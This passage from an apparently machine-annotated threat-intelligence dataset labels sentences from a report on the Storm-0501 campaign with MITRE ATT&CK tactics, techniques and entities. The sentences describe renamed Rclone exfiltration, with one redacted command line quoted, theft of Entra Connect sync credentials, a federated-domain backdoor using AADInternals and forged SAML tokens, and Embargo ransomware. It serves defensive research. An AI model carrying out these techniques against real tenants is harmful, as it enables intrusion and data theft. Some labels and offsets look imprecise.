"TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" }, { "id": "T1036", "name": "Masquerading" } ], "procedure": "The threat actor used Rclone to exfiltrate data from compromised devices and renamed it to Windows-like binaries (e.g., svhost.exe, scvhost.exe) to evade detection.", "entities": [ { "text": "threat actor", "start": 24, "end": 36, "label": "ThreatActor" }, { "text": "Rclone", "start": 63, "end": 69, "label": "MalwareTool" }, { "text": "used the open-source tool Rclone", "start": 37, "end": 69, "label": "Action" }, { "text": "svhost.exe", "start": 146, "end": 156, "label": "Infrastructure_Indicator" }, { "text": "scvhost.exe", "start": 160, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "renamed it", "start": 74, "end": 84, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s32-dc76b8", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "To exfiltrate data, the threat actor used the open-source tool Rclone and renamed it to known Windows binary names or variations of them, such as svhost.exe or scvhost.exe as masquerading means.", "sentence_text": "The threat actor employed the renamed Rclone binaries to transfer data to the cloud, using a dedicated configuration that synchronized files to public cloud storage services such as MegaSync across multiple threads.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567.002", "name": "Exfiltration to Cloud Storage" } ], "procedure": "Used renamed Rclone binaries to exfiltrate data to public cloud storage like MegaSync.", "entities": [ { "text": " threat actor ", "start": 3, "end": 17, "label": "ThreatActor" }, { "text": "Rclone binaries ", "start": 38, "end": 54, "label": "MalwareTool" }, { "text": "MegaSync", "start": 182, "end": 190, "label": "MalwareTool" }, { "text": "employed the renamed Rclone binaries ", "start": 17, "end": 54, "label": "Action" }, { "text": "transfer data to the cloud", "start": 57, "end": 83, "label": "Action" }, { "text": "synchronized files to public cloud storage", "start": 122, "end": 164, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s33-97c2a5", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "The threat actor employed the renamed Rclone binaries to transfer data to the cloud, using a dedicated configuration that synchronized files to public cloud storage services such as MegaSync across multiple threads.", "sentence_text": "The following are command line examples used by the threat actor in demonstrating this behavior:\nSvhost.exe copy –filter-from [REDACTED] [REDACTED] config:[REDACTED] -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11 scvhost.exe –config C:WindowsDebuga.conf copy [REDACTED UNC PATH]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s34-7f1c7c", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "The following are command line examples used by the threat actor in demonstrating this behavior:\nSvhost.exe copy –filter-from [REDACTED] [REDACTED] config:[REDACTED] -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11 scvhost.exe –config C:WindowsDebuga.conf copy [REDACTED UNC PATH]", "sentence_text": "[REDACTED]\nDefense evasion\nThe threat actor attempted to evade detection by tampering with security products in some of the devices they got hands-on-keyboard access to.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Tampered with security products on compromised devices to evade detection.", "entities": [ { "text": "threat actor", "start": 31, "end": 43, "label": "ThreatActor" }, { "text": "attempted to evade detection ", "start": 44, "end": 73, "label": "Action" }, { "text": "tampering with security products", "start": 76, "end": 108, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s35-3bd0f5", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "[REDACTED]\nDefense evasion\nThe threat actor attempted to evade detection by tampering with security products in some of the devices they got hands-on-keyboard access to.", "sentence_text": "On-premises to cloud pivot In their recent campaign, we noticed a shift in Storm-0501’s methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s36-decb9c", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "On-premises to cloud pivot In their recent campaign, we noticed a shift in Storm-0501’s methods.", "sentence_text": "To deploy Microsoft Entra Connect, the application must be installed on an on-premises server or an Azure VM.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s37-8ed231", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "To deploy Microsoft Entra Connect, the application must be installed on an on-premises server or an Azure VM.", "sentence_text": "To decrease the attack surface , Microsoft recommends that organizations deploy Microsoft Entra Connect on a domain-joined server and restrict administrative access to domain administrators or other tightly controlled security groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s38-a67094", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "To decrease the attack surface , Microsoft recommends that organizations deploy Microsoft Entra Connect on a domain-joined server and restrict administrative access to domain administrators or other tightly controlled security groups.", "sentence_text": "These service accounts are responsible for the synchronization process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s39-701bb2", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "These service accounts are responsible for the synchronization process.", "sentence_text": "The cloud Microsoft Entra ID account is prefixed with “ sync__ ” and has the account display name set to “On-Premises Directory Synchronization Service Account”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s40-963de2", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "The cloud Microsoft Entra ID account is prefixed with “ sync__ ” and has the account display name set to “On-Premises Directory Synchronization Service Account”.", "sentence_text": "This user account is assigned with the Directory Synchronization Accounts role (see detailed permissions of this role here ).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s41-17b55e", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "This user account is assigned with the Directory Synchronization Accounts role (see detailed permissions of this role here ).", "sentence_text": "Both user accounts mentioned above are crucial for the Microsoft Entra Connect Sync service operations and their credentials are saved encrypted via DPAPI ( Data Protection API ) on the server’s disk or a remote SQL server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s42-39b6b5", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "Both user accounts mentioned above are crucial for the Microsoft Entra Connect Sync service operations and their credentials are saved encrypted via DPAPI ( Data Protection API ) on the server’s disk or a remote SQL server.", "sentence_text": "We can assess with high confidence that in the recent Storm-0501 campaign, the threat actor specifically located Microsoft Entra Connect Sync servers and managed to extract the plain text credentials of the Microsoft Entra Connect cloud and on-premises sync accounts.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "Located Entra Connect Sync servers and extracted plaintext credentials for cloud and on-prem sync accounts.", "entities": [ { "text": "Storm-0501", "start": 54, "end": 64, "label": "ThreatActor" }, { "text": "Microsoft Entra Connect Sync ", "start": 113, "end": 142, "label": "MalwareTool" }, { "text": "located Microsoft Entra Connect Sync servers", "start": 105, "end": 149, "label": "Action" }, { "text": "extract the plain text credentials of the Microsoft Entra Connect cloud and on-premises sync accounts.", "start": 165, "end": 267, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s43-0dcdab", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "We can assess with high confidence that in the recent Storm-0501 campaign, the threat actor specifically located Microsoft Entra Connect Sync servers and managed to extract the plain text credentials of the Microsoft Entra Connect cloud and on-premises sync accounts.", "sentence_text": "Following the compromise of the cloud Directory Synchronization Account, the threat actor can authenticate using the clear text credentials and get an access token to Microsoft Graph.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "authenticate using the clear text credentials and get an access token to Microsoft Graph", "entities": [ { "text": "the threat actor", "start": 73, "end": 89, "label": "ThreatActor" }, { "text": "cloud Directory Synchronization Account", "start": 32, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Graph", "start": 167, "end": 182, "label": "Infrastructure_Indicator" }, { "text": "authenticate using the clear text credentials", "start": 94, "end": 139, "label": "Action" }, { "text": "get an access token to Microsoft Graph", "start": 144, "end": 182, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s44-4190d8", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "Following the compromise of the cloud Directory Synchronization Account, the threat actor can authenticate using the clear text credentials and get an access token to Microsoft Graph.", "sentence_text": "The compromise of the Microsoft Entra Connect Sync account presents a high risk to the target, as it can allow the threat actor to set or change Microsoft Entra ID passwords of any hybrid account (on-premises account that is synced to Microsoft Entra ID).", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "Used the compromised Sync account to set or change passwords of hybrid Microsoft Entra ID accounts.", "entities": [ { "text": "threat actor ", "start": 115, "end": 128, "label": "ThreatActor" }, { "text": "Microsoft Entra Connect Sync account", "start": 22, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "set or change Microsoft Entra ID passwords of any hybrid account", "start": 131, "end": 195, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s45-c15ff9", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "The compromise of the Microsoft Entra Connect Sync account presents a high risk to the target, as it can allow the threat actor to set or change Microsoft Entra ID passwords of any hybrid account (on-premises account that is synced to Microsoft Entra ID).", "sentence_text": "Cloud session hijacking of on-premises user account Another way to pivot from on-premises to Microsoft Entra ID is to gain control of an on-premises user account that has a respective user account in the cloud.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Gained control of an on-premises account to pivot into its corresponding cloud account.", "entities": [ { "text": "pivot from on-premises to Microsoft Entra ID", "start": 67, "end": 111, "label": "Action" }, { "text": "gain control ", "start": 118, "end": 131, "label": "Action" }, { "text": "on-premises user account", "start": 27, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "cloud.", "start": 204, "end": 210, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-85_mitre_report-p1-s46-1c306c", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "Cloud session hijacking of on-premises user account Another way to pivot from on-premises to Microsoft Entra ID is to gain control of an on-premises user account that has a respective user account in the cloud.", "sentence_text": "In some of the Storm-0501 cases we investigated, at least one of the Domain Admin accounts that was compromised had a respective account in Microsoft Entra ID, with multifactor authentication (MFA) disabled, and assigned with a Global Administrator role.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Compromised a Domain Admin account whose linked Entra ID account lacked MFA and had Global Administrator privileges.", "entities": [ { "text": "Storm-0501", "start": 15, "end": 25, "label": "ThreatActor" }, { "text": "compromised", "start": 100, "end": 111, "label": "Action" }, { "text": "Domain Admin accounts ", "start": 69, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Entra ID", "start": 140, "end": 158, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-85_mitre_report-p1-s47-e2d4b0", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "In some of the Storm-0501 cases we investigated, at least one of the Domain Admin accounts that was compromised had a respective account in Microsoft Entra ID, with multifactor authentication (MFA) disabled, and assigned with a Global Administrator role.", "sentence_text": "It is important to mention that the sync service is unavailable for administrative accounts in Microsoft Entra, hence the passwords and other data are not synced from the on-premises account to the Microsoft Entra account in this case.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s48-25873b", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "It is important to mention that the sync service is unavailable for administrative accounts in Microsoft Entra, hence the passwords and other data are not synced from the on-premises account to the Microsoft Entra account in this case.", "sentence_text": "If a compromised on-premises user account is not assigned with an administrative role in Microsoft Entra ID and is synced to the cloud and no security boundaries such as MFA or Conditional Access are set, then the threat actor could escalate to the cloud through the following:\nIf the password is known, then logging in to Microsoft Entra is possible from any device.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "The threat actor uses the known password of a compromised synced user account (without MFA/Conditional Access) to authenticate to Microsoft Entra ID from any device.", "entities": [ { "text": "threat actor", "start": 214, "end": 226, "label": "ThreatActor" }, { "text": "logging in to Microsoft Entra", "start": 309, "end": 338, "label": "Action" }, { "text": "escalate to the cloud", "start": 233, "end": 254, "label": "Action" }, { "text": " compromised on-premises user account", "start": 4, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Entra ID", "start": 89, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "MFA", "start": 170, "end": 173, "label": "Infrastructure_Indicator" }, { "text": " Conditional Access", "start": 176, "end": 195, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-85_mitre_report-p1-s49-5a1be6", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "If a compromised on-premises user account is not assigned with an administrative role in Microsoft Entra ID and is synced to the cloud and no security boundaries such as MFA or Conditional Access are set, then the threat actor could escalate to the cloud through the following:\nIf the password is known, then logging in to Microsoft Entra is possible from any device.", "sentence_text": "If they hold credentials of a compromised Microsoft Entra Directory Synchronization Account, they can set the cloud password using AADInternals’ Set-AADIntUserPassword cmdlet.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "Use compromised credentials of a Microsoft Entra Directory Synchronization Account to set or modify cloud account passwords using the AADInternals Set-AADIntUserPassword command.", "entities": [ { "text": "hold credentials", "start": 8, "end": 24, "label": "Action" }, { "text": "set the cloud password", "start": 102, "end": 124, "label": "Action" }, { "text": "AADInternals", "start": 131, "end": 143, "label": "MalwareTool" }, { "text": "Set-AADIntUserPassword", "start": 145, "end": 167, "label": "MalwareTool" } ] }, { "uid": "mitre-85_mitre_report-p1-s50-8f979f", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "If they hold credentials of a compromised Microsoft Entra Directory Synchronization Account, they can set the cloud password using AADInternals’ Set-AADIntUserPassword cmdlet.", "sentence_text": "If MFA for that user account is enabled, then authentication with the user will require the threat actor to tamper with the MFA or gain control of a device owned by the user and subsequently hijack its cloud session or extract its Microsoft Entra access tokens along with their MFA claims.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" } ], "procedure": "The attacker must bypass MFA by manipulating MFA settings or by taking over the user’s device to hijack the cloud session or extract access tokens.", "entities": [ { "text": "threat actor ", "start": 92, "end": 105, "label": "ThreatActor" }, { "text": "tamper with the MFA", "start": 108, "end": 127, "label": "Action" }, { "text": "gain control of a device ", "start": 131, "end": 156, "label": "Action" }, { "text": "hijack its cloud session", "start": 191, "end": 215, "label": "Action" }, { "text": "extract its Microsoft Entra access tokens", "start": 219, "end": 260, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s51-326f62", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "If MFA for that user account is enabled, then authentication with the user will require the threat actor to tamper with the MFA or gain control of a device owned by the user and subsequently hijack its cloud session or extract its Microsoft Entra access tokens along with their MFA claims.", "sentence_text": "MFA is a security practice that requires users to provide two or more verification factors to gain access to a resource and is a recommended security practice for all users, especially for privileged administrators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s52-105648", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 52, "context_before": "MFA is a security practice that requires users to provide two or more verification factors to gain access to a resource and is a recommended security practice for all users, especially for privileged administrators.", "sentence_text": "A lack of MFA or Conditional Access policies limiting the sign-in options opens a wide door of possibilities for the attacker to pivot to the cloud environment, especially if the user has administrative privileges.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s53-73f35f", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 53, "context_before": "A lack of MFA or Conditional Access policies limiting the sign-in options opens a wide door of possibilities for the attacker to pivot to the cloud environment, especially if the user has administrative privileges.", "sentence_text": "To increase the security of admin accounts, Microsoft is rolling out additional tenant-level security measures to require MFA for all Azure users Impact Cloud compromise leading to backdoor Following a successful pivot from the on-premises environment to the cloud through the compromised Microsoft Entra Connect Sync user account or the cloud admin account compromised through cloud session hijacking, the threat actor was able to connect to Microsoft Entra (portal/MS Graph) from any device, using a privileged Microsoft Entra ID account, such as a Global Administrator, and was no longer limited to the compromised devices.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "The threat actor used credentials from a compromised Microsoft Entra Connect Sync account or a hijacked cloud admin account to authenticate to Microsoft Entra from any device using a privileged Azure identity.", "entities": [ { "text": "threat actor", "start": 407, "end": 419, "label": "ThreatActor" }, { "text": " connect to Microsoft Entra ", "start": 431, "end": 459, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s54-b8a992", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 54, "context_before": "To increase the security of admin accounts, Microsoft is rolling out additional tenant-level security measures to require MFA for all Azure users Impact Cloud compromise leading to backdoor Following a successful pivot from the on-premises environment to the cloud through the compromised Microsoft Entra Connect Sync user account or the cloud admin account compromised through cloud session hijacking, the threat actor was able to connect to Microsoft Entra (portal/MS Graph) from any device, using a privileged Microsoft Entra ID account, such as a Global Administrator, and was no longer limited to the compromised devices.", "sentence_text": "Once Global Administrator access is available for Storm-0501, we observed them creating a persistent backdoor access for later use by creating a new federated domain in the tenant.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1136.003", "name": "Cloud Account" } ], "procedure": "Used Global Administrator privileges to add a new federated domain for long-term backdoor access.", "entities": [ { "text": "Storm-0501", "start": 50, "end": 60, "label": "ThreatActor" }, { "text": "creating a new federated domain", "start": 134, "end": 165, "label": "Action" }, { "text": "creating a persistent backdoor ", "start": 79, "end": 110, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s55-a5f47d", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 55, "context_before": "Once Global Administrator access is available for Storm-0501, we observed them creating a persistent backdoor access for later use by creating a new federated domain in the tenant.", "sentence_text": "This backdoor enables an attacker to sign in as any user of the Microsoft Entra ID tenant in hand if the Microsoft Entra ID user property ImmutableId is known or set by the attackers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s56-aa38d3", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 56, "context_before": "This backdoor enables an attacker to sign in as any user of the Microsoft Entra ID tenant in hand if the Microsoft Entra ID user property ImmutableId is known or set by the attackers.", "sentence_text": "The threat actor used the open-source tool AADInternals, and its Microsoft Entra ID capabilities to create the backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "Used AADInternals’ Microsoft Entra ID functions to create the backdoor.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "AADInternals,", "start": 43, "end": 56, "label": "MalwareTool" }, { "text": "used the open-source tool", "start": 17, "end": 42, "label": "Action" }, { "text": "reate the backdoor", "start": 101, "end": 119, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s57-7639ea", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 57, "context_before": "The threat actor used the open-source tool AADInternals, and its Microsoft Entra ID capabilities to create the backdoor.", "sentence_text": "AADInternals is a PowerShell module designed for security researchers and penetration testers that provides various methods for interacting and testing Microsoft Entra ID and is commonly used by Storm-0501.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s58-34287d", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 58, "context_before": "AADInternals is a PowerShell module designed for security researchers and penetration testers that provides various methods for interacting and testing Microsoft Entra ID and is commonly used by Storm-0501.", "sentence_text": "To create the backdoor, the threat actor first needed to have a domain of their own that is registered to Microsoft Entra ID.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "They registered and used their own Microsoft Entra ID domain to enable the backdoor.", "entities": [ { "text": " threat actor ", "start": 27, "end": 41, "label": "ThreatActor" }, { "text": "needed to have a domain", "start": 47, "end": 70, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s59-71f636", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 59, "context_before": "To create the backdoor, the threat actor first needed to have a domain of their own that is registered to Microsoft Entra ID.", "sentence_text": "The attacker’s next step is to determine whether the target domain is managed or federated.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1590", "name": "Gather Victim Network Information" } ], "procedure": "They check the domain type (managed vs. federated) before proceeding.", "entities": [ { "text": "The attacker", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "determine whether the target domain is managed or federated", "start": 31, "end": 90, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s60-332740", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "The attacker’s next step is to determine whether the target domain is managed or federated.", "sentence_text": "If the target domain is managed, then the attackers need to convert it to a federated one and provide a root certificate to sign future tokens upon user authentication and authorization processes.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "They convert the managed domain into a federated domain and upload a root certificate to enable signing of authentication tokens.", "entities": [ { "text": "the attackers", "start": 38, "end": 51, "label": "ThreatActor" }, { "text": "convert it to a federated one", "start": 60, "end": 89, "label": "Action" }, { "text": "provide a root certificate ", "start": 94, "end": 121, "label": "Action" }, { "text": "sign future tokens", "start": 124, "end": 142, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s61-1224ae", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "If the target domain is managed, then the attackers need to convert it to a federated one and provide a root certificate to sign future tokens upon user authentication and authorization processes.", "sentence_text": "If the target domain is already federated, then the attackers need to add the root certificate as “NextSigningCertificate”.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "They add the root certificate to the federated domain configuration as the NextSigningCertificate.", "entities": [ { "text": "the attackers ", "start": 48, "end": 62, "label": "ThreatActor" }, { "text": " add the root certificate as “NextSigningCertificate”.", "start": 69, "end": 123, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s62-e71001", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "If the target domain is already federated, then the attackers need to add the root certificate as “NextSigningCertificate”.", "sentence_text": "Once a backdoor domain is available for use, the threat actor creates a federation trust between the compromised tenant, and their own tenant.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098", "name": "Account Manipulation" } ], "procedure": "They establish a federation trust between the compromised tenant and their own tenant.", "entities": [ { "text": "threat actor ", "start": 49, "end": 62, "label": "ThreatActor" }, { "text": "creates a federation trust", "start": 62, "end": 88, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s63-7551d7", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "Once a backdoor domain is available for use, the threat actor creates a federation trust between the compromised tenant, and their own tenant.", "sentence_text": "The threat actor uses the AADInternals commands that enable the creation of Security Assertion Markup Language (SAML or SAML2) tokens, which can be used to impersonate any user in the organization and bypass MFA to sign in to any application.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1606", "name": "Forge Web Credentials" }, { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1550", "name": "Use Alternate Authentication Material" } ], "procedure": "The threat actor used AADInternals commands to generate SAML/SAML2 tokens, enabling user impersonation and MFA bypass to access applications in the organization.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "uses the AADInternals commands", "start": 17, "end": 47, "label": "Action" }, { "text": "AADInternals", "start": 26, "end": 38, "label": "MalwareTool" }, { "text": "Security Assertion Markup Language (SAML or SAML2) tokens", "start": 76, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "impersonate any user in the organization", "start": 156, "end": 196, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s64-6613dc", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "The threat actor uses the AADInternals commands that enable the creation of Security Assertion Markup Language (SAML or SAML2) tokens, which can be used to impersonate any user in the organization and bypass MFA to sign in to any application.", "sentence_text": "On-premises compromise leading to ransomware", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s65-dcfe34", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "On-premises compromise leading to ransomware", "sentence_text": "Once the threat actor achieved sufficient control over the network, successfully extracted sensitive files, and managed to move laterally to the cloud environment, the threat actor then deployed the Embargo ransomware across the organization.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "The threat actor deployed Embargo ransomware after gaining network control, exfiltrating data, and moving to the cloud.", "entities": [ { "text": " threat actor ", "start": 8, "end": 22, "label": "ThreatActor" }, { "text": "Embargo ransomware", "start": 199, "end": 217, "label": "MalwareTool" }, { "text": "deployed the Embargo ransomware", "start": 186, "end": 217, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s66-413471", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "Once the threat actor achieved sufficient control over the network, successfully extracted sensitive files, and managed to move laterally to the cloud environment, the threat actor then deployed the Embargo ransomware across the organization.", "sentence_text": "We observed that the threat actor did not always resort to ransomware distribution, and in some cases only maintained backdoor access to the network.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "The threat actor kept persistent unauthorized access instead of deploying ransomware.", "entities": [ { "text": "threat actor", "start": 21, "end": 33, "label": "ThreatActor" }, { "text": "maintained backdoor access to the network.", "start": 107, "end": 149, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s67-c76b95", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "We observed that the threat actor did not always resort to ransomware distribution, and in some cases only maintained backdoor access to the network.", "sentence_text": "Embargo ransomware is a new strain developed in Rust, known to use advanced encryption methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s68-606854", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "Embargo ransomware is a new strain developed in Rust, known to use advanced encryption methods.", "sentence_text": "Operating under the RaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks in exchange for a share of the ransom.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "The group offers its ransomware platform to affiliates who launch attacks and share ransom proceeds.", "entities": [ { "text": "Storm-0501 ", "start": 91, "end": 102, "label": "ThreatActor" }, { "text": "Embargo", "start": 60, "end": 67, "label": "MalwareTool" }, { "text": " ransomware group behind Embargo", "start": 35, "end": 67, "label": "ThreatActor" }, { "text": "use its platform to launch attacks in exchange for a share of the ransom.", "start": 105, "end": 178, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s69-34ab36", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "Operating under the RaaS model, the ransomware group behind Embargo allows affiliates like Storm-0501 to use its platform to launch attacks in exchange for a share of the ransom.", "sentence_text": "Embargo affiliates employ double extortion tactics, where they first encrypt a victim’s files and threaten to leak stolen sensitive data unless a ransom is paid.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": 